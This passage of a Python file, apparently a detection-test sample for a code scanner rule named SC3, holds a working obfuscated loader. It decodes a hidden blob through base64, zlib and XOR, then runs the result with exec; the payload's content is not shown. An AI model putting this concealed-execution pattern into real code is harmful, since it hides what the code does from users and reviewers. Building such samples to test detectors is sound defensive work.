/pW3FLZShKK9iMtbRlM6y/7fcOooUUZp3cok+W274TPOvoreL8Ue85RRFd1wu0+C8flgEcYgN08E0g5jX2YUt+m0cKgzCVPPDjxz96LF1G"
_K = bytes.fromhex("24444d228502ff403aec2fe3")

def _xor(buf, k):
    return bytes(b ^ k[i % len(k)] for i, b in enumerate(buf))

def _decode():
    inner = zlib.decompress(base64.b64decode(_OUTER))
    return _xor(base64.b64decode(inner), _K).decode("utf-8")

if __name__ == "__main__":
    # SC3 signature: base64.b64decode(...) -> exec / compile near by
    exec(compile(_decode(), "<runtime>", "exec"), {})
